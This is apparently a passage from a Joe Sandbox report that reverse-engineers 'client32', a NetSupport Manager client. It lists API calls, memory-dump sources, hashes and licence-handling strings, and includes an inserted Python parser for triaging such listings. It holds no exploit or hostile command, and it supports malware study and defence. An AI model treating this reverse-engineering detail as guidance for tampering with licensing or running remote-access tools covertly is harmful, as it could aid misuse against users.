• Associated: 00000007.00000002.4096893357.000000001127E000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.000000001135E000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.0000000011360000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: LocalRectTime__time64
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 394334608-0
                                                                                                                                                                                                    • Opcode ID: de18328b6b15506cedc7e23451f66c7985023e4612589437c270b1aaafaaec95
                                                                                                                                                                                                    • Instruction ID: 290189b485d165d605b85d0a399bd35ca550a15b876ac08f977e3d1591b43d19
                                                                                                                                                                                                    • Opcode Fuzzy Hash: de18328b6b15506cedc7e23451f66c7985023e4612589437c270b1aaafaaec95
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 01316C75904B44DFD320CF68D944B9AFBE8EB48714F00896EE86AC7780DB34E904CB51
APIs
• GetLastError.KERNEL32(00000400,?,00000000,00000000,?,?,1105990A,DuplicateHandle), ref: 11059281
• FormatMessageA.KERNEL32(00001100,00000000,00000000,?,?,1105990A,DuplicateHandle), ref: 1105928F
• LocalFree.KERNEL32(?,?,?,1105990A,DuplicateHandle), ref: 11059299
Memory Dump Source
• Source File: 00000007.00000002.4096691220.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
• Associated: 00000007.00000002.4096672888.0000000011000000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096807356.000000001118F000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096848908.00000000111DD000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096871958.00000000111EC000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.00000000111F2000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.00000000111FC000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.0000000011222000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.0000000011229000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.000000001123D000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.000000001124C000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.0000000011250000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.0000000011252000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.000000001127E000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.000000001135E000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.0000000011360000.00000002.00000001.01000000.0000000B.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_11000000_client32.jbxd
Yara matches
Similarity
• API ID: ErrorFormatFreeLastLocalMessage
• String ID:
• API String ID: 1365068426-0
• Opcode ID: c4da030cc566985fed10b8ae72e49a46dab86cf533d5b385c533f073b0b7a5cb
• Instruction ID: 5b7cf9c0659eada95368eb5e30aa7fe70508538aa6eda4fa9add4fab25305eb2
• Opcode Fuzzy Hash: c4da030cc566985fed10b8ae72e49a46dab86cf533d5b385c533f073b0b7a5cb
• Instruction Fuzzy Hash: D2D05E79684308BBE2159BD0CC4AFADB7ACD70CB16F200166FB01961C0DAB169008B76
APIs
• DeviceIoControl.KERNEL32(00000000,002A400C,00000000,00000000,00000000,00000000,11030FDE,00000000), ref: 110A9260
Memory Dump Source
• Source File: 00000007.00000002.4096691220.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
• Associated: 00000007.00000002.4096672888.0000000011000000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096807356.000000001118F000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096848908.00000000111DD000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096871958.00000000111EC000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.00000000111F2000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.00000000111FC000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.0000000011222000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.0000000011229000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.000000001123D000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.000000001124C000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.0000000011250000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.0000000011252000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.000000001127E000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.000000001135E000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.0000000011360000.00000002.00000001.01000000.0000000B.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_11000000_client32.jbxd
Yara matches
Similarity
• API ID: ControlDevice
• String ID:
• API String ID: 2352790924-0
• Opcode ID: bee1594c9b993945fc66beb885ff9e6d2c70a72c6a38e995273342c6cce042f3
• Instruction ID: e696868f72d0725410e46aa1b0c9657244e5a899ecae170b9f1eee7695916dac
• Opcode Fuzzy Hash: bee1594c9b993945fc66beb885ff9e6d2c70a72c6a38e995273342c6cce042f3
• Instruction Fuzzy Hash: D5E0CDF5A0820CBFA304DEF99CC1C6BB79CD5063687100399F629C3141E5719D109770
APIs
• wsprintfA.USER32 ref: 1102B5F5
• GetTempFileNameA.KERNEL32(?,nsm,00000000,?), ref: 1102B658
Strings
Memory Dump Source
• Source File: 00000007.00000002.4096691220.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
• Associated: 00000007.00000002.4096672888.0000000011000000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096807356.000000001118F000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096848908.00000000111DD000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096871958.00000000111EC000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.00000000111F2000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.00000000111FC000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.0000000011222000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.0000000011229000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.000000001123D000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.000000001124C000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.0000000011250000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.0000000011252000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.000000001127E000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.000000001135E000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.0000000011360000.00000002.00000001.01000000.0000000B.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_11000000_client32.jbxd
Yara matches
Similarity
• API ID: FileNameTempwsprintf
• String ID: %snsm.%s.%02d.lic$*** Activate new license file in registy, key [%s]$*** Copied and read new license file$*** Copy enforce section for config %x$*** Set eval flags failed, error [%d]$*** Set eval flags registy, key [%s]$*** product after copy %d$*** product before copy %d$305090$HasEval$IsA()$Portable Tech Console\nsm.lic$Portable Tutor\nsm.lic$Product$ReplaceLicFile : Attempt to rename %s to %s$ReplaceLicFile : License error %d reading %s$ReplaceLicFile : Load new license file$ReplaceLicFile : New checksum and disk checksum don't match so we write file$ReplaceLicFile : Read license file$ReplaceLicFile : Rename current license file to %s$ReplaceLicFile : Revert to previous license$ReplaceLicFile : Status after config test %d - lic error %d$ReplaceLicFile : Status after renames %d - error %d$ReplaceLicFile : Written file %s, read into temporary config$ReplaceLicFile : bWriteFile = %d, LoadLicense = %d$ReplaceLicFile : flags & 2 - just reread the license details$V12.10.4$_License$_checksum$e:\nsmsrc\nsm\1210\1210f\ctl32\NSMString.h$nsm$product$z:
• API String ID: 2029944419-3968474935
• Opcode ID: 174ab10ef622b4b4a599600fe98865488f638ae1b667fd0395751504558a5437
• Instruction ID: ea34cc8c2541377923297bd1bd1432500824a42ecbb912290de042532a9e56a7
• Opcode Fuzzy Hash: 174ab10ef622b4b4a599600fe98865488f638ae1b667fd0395751504558a5437
• Instruction Fuzzy Hash: 14020575E0062A6BDB20DBA4CC40FEEF379AF84708F5441D5E919A7181EB716B84CFA1
APIs
• wsprintfA.USER32 ref: 1102B5F5
• GetTempFileNameA.KERNEL32(?,nsm,00000000,?), ref: 1102B658
Strings
Memory Dump Source
• Source File: 00000007.00000002.4096691220.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
• Associated: 00000007.00000002.4096672888.0000000011000000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096807356.000000001118F000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096848908.00000000111DD000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096871958.00000000111EC000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.00000000111F2000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.00000000111FC000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.0000000011222000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.0000000011229000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.000000001123D000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.000000001124C000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.0000000011250000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.0000000011252000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.000000001127E000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.000000001135E000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.0000000011360000.00000002.00000001.01000000.0000000B.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_11000000_client32.jbxd
Yara matches
Similarity
• API ID: FileNameTempwsprintf
• String ID: %snsm.%s.%02d.lic$*** Activate new license file in registy, key [%s]$*** Copied and read new license file$*** Copy enforce section for config %x$*** Set eval flags failed, error [%d]$*** Set eval flags registy, key [%s]$*** product after copy %d$*** product before copy %d$305090$HasEval$IsA()$Portable Tech Console\nsm.lic$Portable Tutor\nsm.lic$Product$ReplaceLicFile : File checksum matches new checksum so don't write file but load$ReplaceLicFile : Load new license file$ReplaceLicFile : Read license file$ReplaceLicFile : Rename current license file to %s$ReplaceLicFile : bWriteFile = %d, LoadLicense = %d$ReplaceLicFile : flags & 2 - just reread the license details$V12.10.4$_License$_checksum$e:\nsmsrc\nsm\1210\1210f\ctl32\NSMString.h$nsm$product$z:
                                                                                                                                                                                                    • API String ID: 2029944419-3224476070
                                                                                                                                                                                                    • Opcode ID: 56bb1cfb618b80d56de75f6d6c36360757d97bcfb224a5606af07d0a30c758e5
                                                                                                                                                                                                    • Instruction ID: 6903609fa05968b79cc99ebba03b166313860aa57c38e94e7175ce74c4acfd72
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 56bb1cfb618b80d56de75f6d6c36360757d97bcfb224a5606af07d0a30c758e5
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 6BC12575E0062A5BEB20DB64CC40FEEF779AF80708F5441D5E91977181EB716A84CFA2
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • _isatty.MSVCR100(?,?,00000002,?,?,687EECE1,?,?,?,687EED00,00000010,688089FE,?,00000000,00000002), ref: 687EEBF3
                                                                                                                                                                                                    • WriteFile.KERNEL32(00000000,?,?,?,00000000,?,00000002,?,?,687EECE1,?,?,?,687EED00,00000010,688089FE), ref: 687EEC24
                                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 687EF105
                                                                                                                                                                                                    • __doserrno.MSVCR100(00000002,?,?,687EECE1,?,?,?,687EED00,00000010,688089FE,?,00000000,00000002,?,688845D0,?), ref: 6880FD8D
                                                                                                                                                                                                    • _errno.MSVCR100(00000002,?,?,687EECE1,?,?,?,687EED00,00000010,688089FE,?,00000000,00000002,?,688845D0,?), ref: 6880FD94
                                                                                                                                                                                                    • _invalid_parameter_noinfo.MSVCR100(00000002,?,?,687EECE1,?,?,?,687EED00,00000010,688089FE,?,00000000,00000002,?,688845D0,?), ref: 6880FD9F
                                                                                                                                                                                                    • __doserrno.MSVCR100(?,00000002,?,?,687EECE1,?,?,?,687EED00,00000010,688089FE,?,00000000,00000002,?,688845D0), ref: 6880FDBA
                                                                                                                                                                                                    • _errno.MSVCR100(?,00000002,?,?,687EECE1,?,?,?,687EED00,00000010,688089FE,?,00000000,00000002,?,688845D0), ref: 6880FDC2
                                                                                                                                                                                                    • _invalid_parameter_noinfo.MSVCR100(?,00000002,?,?,687EECE1,?,?,?,687EED00,00000010,688089FE,?,00000000,00000002,?,688845D0), ref: 6880FDCD
                                                                                                                                                                                                    • __lseeki64_nolock.LIBCMT ref: 6880FDDE
                                                                                                                                                                                                    • _getptd.MSVCR100(?,00000002,?,?,687EECE1,?,?,?,687EED00,00000010,688089FE,?,00000000,00000002,?,688845D0), ref: 6880FDF8
                                                                                                                                                                                                    • GetConsoleMode.KERNEL32(?,?,?,00000002,?,?,687EECE1,?,?,?,687EED00,00000010,688089FE,?,00000000,00000002), ref: 6880FE16
                                                                                                                                                                                                    • GetConsoleCP.KERNEL32(?,687EECE1,?,?,?,687EED00,00000010,688089FE,?,00000000,00000002,?,688845D0,?,?), ref: 6880FE36
                                                                                                                                                                                                    • isleadbyte.MSVCR100(00000000), ref: 6880FEA6
                                                                                                                                                                                                    • __fassign.LIBCMT(?,?,00000002), ref: 6880FED0
                                                                                                                                                                                                    • __fassign.LIBCMT(?,?,00000001), ref: 6880FEF4
                                                                                                                                                                                                    • WideCharToMultiByte.KERNEL32(?,00000000,?,00000001,?,00000005,00000000,00000000), ref: 6880FF26
                                                                                                                                                                                                    • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 6880FF4F
                                                                                                                                                                                                    • WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 6880FFA8
                                                                                                                                                                                                    • _putwch_nolock.MSVCR100(?), ref: 6881000B
                                                                                                                                                                                                    • _putwch_nolock.MSVCR100(0000000D), ref: 68810038
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000007.00000002.4097447824.00000000687D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 687D0000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000007.00000002.4097426862.00000000687D0000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                    • Associated: 00000007.00000002.4097511143.0000000068884000.00000004.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                    • Associated: 00000007.00000002.4097532016.0000000068886000.00000008.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                    • Associated: 00000007.00000002.4097551046.0000000068889000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_687d0000_client32.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: FileWrite$Console__doserrno__fassign_errno_invalid_parameter_noinfo_putwch_nolock$ByteCharErrorLastModeMultiWide__lseeki64_nolock_getptd_isattyisleadbyte
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 1737003884-0
                                                                                                                                                                                                    • Opcode ID: 3dbc6e294da2957ce205c0b760e1f7c28b87792cff0c4b5d6112c3bcb33e08ac
                                                                                                                                                                                                    • Instruction ID: 61ec80c96ec5be4595383bfb4d95214a796f7200bfd1c12cc53ef2e85e312f93
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 3dbc6e294da2957ce205c0b760e1f7c28b87792cff0c4b5d6112c3bcb33e08ac
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 2A129E35A05269CFCB218F28CD88BD9B7B4FF0A314F8445E9E45AD7991D7709A80CF62
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • LoadCursorA.USER32(00000000,00007F00), ref: 111390BA
                                                                                                                                                                                                    • GetStockObject.GDI32(00000004), ref: 111390C5
                                                                                                                                                                                                    • RegisterClassA.USER32(?), ref: 111390D9
                                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 1113914F
                                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 1113916B
                                                                                                                                                                                                    • CreateWindowExA.USER32(00080020,NSMBlankWnd,Blank,88800000,?,?,?,?,00000000,00000000,00000000,00000000), ref: 111391D5
                                                                                                                                                                                                    • SetWindowPos.USER32(?,00000001,00000000,00000000,00000000,00000000,00000053), ref: 1113923E
                                                                                                                                                                                                    • SetWindowPos.USER32(?,000000FF,00000000,00000000,00000000,00000000,00000053), ref: 1113926D
                                                                                                                                                                                                    • UpdateWindow.USER32(?), ref: 1113929B
                                                                                                                                                                                                    • GetProcAddress.KERNEL32(?,DwmEnableComposition), ref: 111392B6
                                                                                                                                                                                                    • SetTimer.USER32(?,00000081,00000014,00000000), ref: 111392FA
                                                                                                                                                                                                    • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,110F55DC), ref: 11139304
                                                                                                                                                                                                      • Part of subcall function 110290F0: GetLastError.KERNEL32(?,?), ref: 1102910C
                                                                                                                                                                                                      • Part of subcall function 110290F0: wsprintfA.USER32 ref: 11029157
                                                                                                                                                                                                      • Part of subcall function 110290F0: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029193
                                                                                                                                                                                                      • Part of subcall function 110290F0: ExitProcess.KERNEL32 ref: 110291A9
                                                                                                                                                                                                    • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,110F55DC), ref: 11139322
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000007.00000002.4096691220.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096672888.0000000011000000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096807356.000000001118F000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096848908.00000000111DD000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096871958.00000000111EC000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.00000000111F2000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.00000000111FC000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011222000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011229000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001123D000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001124C000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011250000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011252000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001127E000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001135E000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011360000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: ErrorLast$Window$AddressClassCreateCursorExitLoadMessageObjectProcProcessRegisterStockTimerUpdatewsprintf
                                                                                                                                                                                                    • String ID: Blank$BlankHeight$BlankWidth$BlankWnd x%x created, w=%d, h=%d$DwmEnableComposition$Error setting blankwnd timer, e=%d$Error. BlankWnd not created, e=%d$Error. RegisterClass(%s) failed, e=%d$Info. Class %s already registered$NSMBlankWnd$_debug$e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$m_hWnd
                                                                                                                                                                                                    • API String ID: 1116282658-3566152235
                                                                                                                                                                                                    • Opcode ID: d6d6ab1509d3c4d41658e3a31fc9e6f75bcf691539e9c4f314b72d0600c8e854
                                                                                                                                                                                                    • Instruction ID: 6cb21f8f8127432fbcbf373ae429d8022df700afa094652b34364ba5c840ba31
                                                                                                                                                                                                    • Opcode Fuzzy Hash: d6d6ab1509d3c4d41658e3a31fc9e6f75bcf691539e9c4f314b72d0600c8e854
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 4D81D575B4030AAFD710DFA5CC85FEEF7B8EB88715F20442DF659A6280E77065408B55
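The per-function listings in this section (an APIs list, then Memory Dump Source, Joe Sandbox IDA Plugin and Similarity) are far easier to pivot on once parsed into records: which function hands which class name to CreateWindowExA, which dump and load base it was lifted from, which blocks share an API String ID, and which calls are a block's own versus ones inherited through "Part of subcall function" lines. The Python below is an added example written for this page, not Joe Sandbox code. It assumes only the block layout visible above; its sample input is an abridged re-typing of the NSMBlankWnd creator and the dialog-setup listing from this section, and its reading of the first dotted field of the .sdmp file name as the report's process number is an assumption, not something the page states.

```python
"""Parse Joe Sandbox per-function listings into records for triage.

Added example for this report page, not Joe Sandbox code.  Assumed layout
(as visible on the page): an 'APIs' heading, bullets 'Name.MODULE(args),
ref: ADDR' (args and ', ref' optional; nested bullets may be prefixed
'Part of subcall function X: '), then 'Strings', 'Memory Dump Source',
'Joe Sandbox IDA Plugin', 'Yara matches' and 'Similarity' sections whose
bullets are 'Key: value' pairs.
"""
from __future__ import annotations
import re
from dataclasses import dataclass, field

# One API-call bullet, e.g. 'GetLastError.KERNEL32 ref: 1113914F'
API_RE = re.compile(
    r"^(?:Part of subcall function (?P<sub>[0-9A-F]+): )?"
    r"(?P<name>[A-Za-z_]\w*)\.(?P<module>[A-Za-z0-9_]+)"
    r"(?:\((?P<args>[^)]*)\))?(?:,?\s*ref: (?P<ref>[0-9A-F]+))?$"
)
# 'Key: value' bullets (Source File, Associated, String ID, API String ID, ...)
KV_RE = re.compile(r"^(?P<key>[A-Za-z ]+?):\s?(?P<value>.*)$")
HEADINGS = {"Strings", "Memory Dump Source", "Joe Sandbox IDA Plugin",
            "Yara matches", "Similarity"}


@dataclass
class ApiCall:
    name: str
    module: str
    args: list
    ref: str
    subcall_of: str | None = None   # set for 'Part of subcall function' lines


@dataclass
class FunctionBlock:
    apis: list = field(default_factory=list)
    strings: list = field(default_factory=list)   # 'String ID' split on '$'
    source_file: str = ""
    meta: dict = field(default_factory=dict)      # remaining Key: value pairs

    def calls(self, name):
        return [a for a in self.apis if a.name == name]


def _clean(line):
    # Drop indentation, the bullet glyph and the 'Download File' link text
    # that the page fuses onto 'Associated:' lines.
    return line.strip().lstrip("• ").strip().removesuffix("Download File").strip()


def parse_blocks(text):
    blocks, cur = [], None
    for raw in text.splitlines():
        line = _clean(raw)
        if not line or line in HEADINGS:
            continue
        if line == "APIs":               # every function listing starts here
            cur = FunctionBlock()
            blocks.append(cur)
            continue
        if cur is None:
            continue
        m = API_RE.match(line)
        if m:
            args = [a.strip() for a in (m.group("args") or "").split(",") if a.strip()]
            cur.apis.append(ApiCall(m.group("name"), m.group("module"), args,
                                    m.group("ref") or "", m.group("sub")))
            continue
        m = KV_RE.match(line)
        if not m:
            continue
        key, value = m.group("key"), m.group("value")
        if key == "String ID":
            cur.strings = [s for s in value.split("$") if s]
        elif key == "Source File":
            cur.source_file = value
        elif key == "Associated":
            cur.meta.setdefault("associated", []).append(value)
        else:
            cur.meta[key] = value
    return blocks


def source_info(block):
    """(process number, load base) from the dump name.  Assumption: the first
    dotted field of the .sdmp name is the report's process number."""
    name = block.source_file.split(",")[0]
    base = re.search(r"Offset: ([0-9A-Fa-f]+)", block.source_file)
    return (int(name.split(".")[0], 16), int(base.group(1), 16) if base else None)


def window_classes(blocks):
    """Class names passed to CreateWindowExA (2nd argument) with the call site."""
    return [(c.args[1], c.ref) for b in blocks
            for c in b.calls("CreateWindowExA") if len(c.args) > 1]


def callers_of(blocks, api_name):
    """Blocks whose own code (not a subcall) invokes api_name."""
    return [b for b in blocks
            if any(c.name == api_name and c.subcall_of is None for c in b.apis)]


# Constructed sample: abridged re-typing of two listings from this section.
SAMPLE = r"""
APIs
• RegisterClassA.USER32(?), ref: 111390D9
• GetLastError.KERNEL32 ref: 1113914F
• CreateWindowExA.USER32(00080020,NSMBlankWnd,Blank,88800000,?,?,?,?,00000000,00000000,00000000,00000000), ref: 111391D5
  • Part of subcall function 110290F0: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029193
Strings
Memory Dump Source
• Source File: 00000007.00000002.4096691220.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
• Associated: 00000007.00000002.4096672888.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
Similarity
• String ID: Blank$BlankHeight$BlankWidth$NSMBlankWnd$e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h
• API String ID: 1116282658-3566152235
APIs
• ExtractIconA.SHELL32(11000000,00000000,00000000), ref: 110433F9
• _memset.LIBCMT ref: 11043445
• SetDlgItemTextA.USER32(?,00000002,?), ref: 11043627
Similarity
• String ID:
"""
```

Feed parse_blocks the saved text of the report's disassembly section; window_classes then lists the class names handed to CreateWindowExA (here NSMBlankWnd at 111391D5), source_info tells you which dump each block came from, and callers_of keeps a block's own calls apart from those it only reaches through a subcall.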
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                      • Part of subcall function 11141430: ExpandEnvironmentStringsA.KERNEL32(?,?,00000104,75C07310), ref: 11141457
                                                                                                                                                                                                    • ExtractIconA.SHELL32(11000000,00000000,00000000), ref: 110433F9
                                                                                                                                                                                                    • _memset.LIBCMT ref: 11043445
                                                                                                                                                                                                    • _strncpy.LIBCMT ref: 11043473
                                                                                                                                                                                                    • wsprintfA.USER32 ref: 11043558
                                                                                                                                                                                                    • _strncpy.LIBCMT ref: 110435A1
                                                                                                                                                                                                    • _strncpy.LIBCMT ref: 110435D5
                                                                                                                                                                                                    • SetDlgItemTextA.USER32(?,?,?), ref: 110435F2
                                                                                                                                                                                                    • SetDlgItemTextA.USER32(?,00000002,?), ref: 11043627
                                                                                                                                                                                                    • SetTimer.USER32(00000000,00000001,000003E8,00000000), ref: 11043676
                                                                                                                                                                                                    • SetDlgItemTextA.USER32(?,?,11190240), ref: 1104368E
                                                                                                                                                                                                    • BringWindowToTop.USER32(?), ref: 110436CA
                                                                                                                                                                                                    • SetWindowPos.USER32(?,00000001,00000000,00000000,00000000,00000000,00000003), ref: 110436E3
                                                                                                                                                                                                    • SetWindowPos.USER32(?,000000FF,00000000,00000000,00000000,00000000,00000003), ref: 110436F8
                                                                                                                                                                                                      • Part of subcall function 1115B8E0: SetForegroundWindow.USER32(00000000), ref: 1115B90E
                                                                                                                                                                                                    • MessageBeep.USER32(000000FF), ref: 11043705
                                                                                                                                                                                                      • Part of subcall function 1105D340: __wcstoi64.LIBCMT ref: 1105D37D
                                                                                                                                                                                                    • GetDlgItem.USER32(?,00000002), ref: 1104372A
                                                                                                                                                                                                    • SetFocus.USER32(00000000), ref: 11043731
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000007.00000002.4096691220.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096672888.0000000011000000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096807356.000000001118F000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096848908.00000000111DD000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096871958.00000000111EC000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.00000000111F2000.00000002.00000001.01000000.0000000B.sdmp
